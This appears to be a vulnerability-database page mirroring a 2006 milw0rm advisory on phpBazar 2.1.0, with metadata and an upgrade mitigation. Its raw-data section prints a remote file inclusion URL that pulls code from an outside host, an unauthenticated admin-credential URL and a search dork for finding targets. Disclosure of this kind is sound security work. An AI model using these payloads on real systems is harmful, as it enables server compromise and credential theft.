header-logo
Suggest Exploit
vendor:
phpBazar
by:
milw0rm.com
7,5
CVSS
HIGH
Remote File Inclusion, Access to Admin Login and Password
94
CWE
Product Name: phpBazar
Affected Version From: 2.1.0
Affected Version To: 2.1.0
Patch Exists: YES
Related CWE: CVE-2006-2590
CPE: a:smartisoft:phpbazar:2.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

phpBazar <= 2.1.0 Multiple vulnerabilites

phpBazar is a web-based application written in PHP and MySQL. It is vulnerable to a Remote File Inclusion vulnerability and an Access to Admin Login and Password vulnerability. The Remote File Inclusion vulnerability is due to a lack of proper sanitization of user-supplied input to the 'language_dir' parameter in the 'classified_right.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system. The Access to Admin Login and Password vulnerability is due to a lack of proper authentication in the 'admin.php' script. An attacker can exploit this vulnerability to gain access to the admin login and password.

Mitigation:

Upgrade to version 2.1.1 or later.
Source

Exploit-DB raw data:

Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# milw0rm.com [2006-05-19]

Navigation

Suggest Exploit

Services By CQR